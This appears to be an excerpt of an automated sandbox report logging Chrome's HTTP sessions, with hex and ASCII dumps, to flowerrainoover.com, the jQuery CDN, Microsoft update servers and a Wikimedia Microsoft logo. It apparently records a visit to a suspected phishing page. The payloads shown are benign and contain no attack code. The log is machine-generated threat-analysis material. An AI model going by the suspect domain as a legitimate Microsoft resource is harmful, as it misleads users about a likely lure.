                                    7192.168.2.1649721172.67.157.2544437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:45 UTC789OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                    Host: flowerrainoover.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.164972223.218.208.109443
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:46 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    Accept-Encoding: identity
                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                    Range: bytes=0-2147483646
                                    User-Agent: Microsoft BITS/7.8
                                    Host: fs.microsoft.com
                                    2024-11-27 22:06:46 UTC535INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                    ApiVersion: Distribute 1.1
                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                    Cache-Control: public, max-age=102718
                                    Date: Wed, 27 Nov 2024 22:06:46 GMT
                                    Content-Length: 55
                                    Connection: close
                                    X-CID: 2
                                    2024-11-27 22:06:46 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.1649724151.101.194.1374437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:46 UTC537OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                    Host: code.jquery.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://flowerrainoover.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:47 UTC613INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Length: 89501
                                    Server: nginx
                                    Content-Type: application/javascript; charset=utf-8
                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                    ETag: "28feccc0-15d9d"
                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Via: 1.1 varnish, 1.1 varnish
                                    Accept-Ranges: bytes
                                    Date: Wed, 27 Nov 2024 22:06:46 GMT
                                    Age: 1266739
                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740066-EWR
                                    X-Cache: HIT, HIT
                                    X-Cache-Hits: 2774, 3
                                    X-Timer: S1732745207.956352,VS0,VE0
                                    Vary: Accept-Encoding
                                    2024-11-27 22:06:47 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                    2024-11-27 22:06:47 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                    2024-11-27 22:06:47 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                    2024-11-27 22:06:47 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                    2024-11-27 22:06:47 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                    2024-11-27 22:06:47 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                    2024-11-27 22:06:47 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                    2024-11-27 22:06:47 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                    2024-11-27 22:06:47 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                    2024-11-27 22:06:47 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.16497234.175.87.197443
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:47 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=eA277dL4f+3cxax&MD=RxVDfndl HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                    Host: slscr.update.microsoft.com
                                    2024-11-27 22:06:47 UTC560INHTTP/1.1 200 OK
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Content-Type: application/octet-stream
                                    Expires: -1
                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                    MS-CorrelationId: 88d7e394-08fc-4810-aca3-87866f7b3907
                                    MS-RequestId: a3904912-2739-4c77-8bd2-9e3451e968f1
                                    MS-CV: 5kKNTmwcQkKytAXw.0
                                    X-Microsoft-SLSClientCache: 2880
                                    Content-Disposition: attachment; filename=environment.cab
                                    X-Content-Type-Options: nosniff
                                    Date: Wed, 27 Nov 2024 22:06:46 GMT
                                    Connection: close
                                    Content-Length: 24490
                                    2024-11-27 22:06:47 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                    2024-11-27 22:06:47 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.1649727185.15.58.2404437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:49 UTC585OUTGET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1
                                    Host: upload.wikimedia.org
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:49 UTC1080INHTTP/1.1 200 OK
                                    date: Wed, 27 Nov 2024 00:18:32 GMT
                                    server: ATS/9.2.6
                                    etag: W/363fdd53d34303b727d9dab161b8e88b
                                    content-type: image/svg+xml
                                    x-object-meta-sha1base36: an1udxuweqh76ugogpdy8qhw9zzoroi
                                    last-modified: Thu, 29 Jul 2021 02:10:50 GMT
                                    vary: Accept-Encoding
                                    age: 78497
                                    x-cache: cp6001 hit, cp6003 hit/210
                                    x-cache-status: hit-front
                                    server-timing: cache;desc="hit-front", host;desc="cp6003"
                                    strict-transport-security: max-age=106384710; includeSubDomains; preload
                                    report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                    nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                    x-client-ip: 8.46.123.228
                                    x-content-type-options: nosniff
                                    access-control-allow-origin: *
                                    access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                    timing-allow-origin: *
                                    accept-ranges: bytes
                                    content-length: 272
                                    connection: close
                                    2024-11-27 22:06:49 UTC272INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 33 66 33 66 33 22 20 64 3d 22 4d 30 20 30 68 32 33 76 32 33 48 30 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 33 35 33 32 35 22 20 64 3d 22 4d 31 20 31 68 31 30 76 31 30 48 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 38 31 62 63 30 36 22 20 64 3d 22 4d 31 32 20 31 68 31 30 76 31 30 48 31 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 35 61 36 66 30 22 20 64 3d 22 4d 31 20 31 32 68 31 30 76 31 30 48 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 62 61 30 38 22 20 64 3d 22 4d 31 32 20 31 32 68 31
                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h1


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.1649729172.67.157.2544437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:50 UTC926OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                    Host: flowerrainoover.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
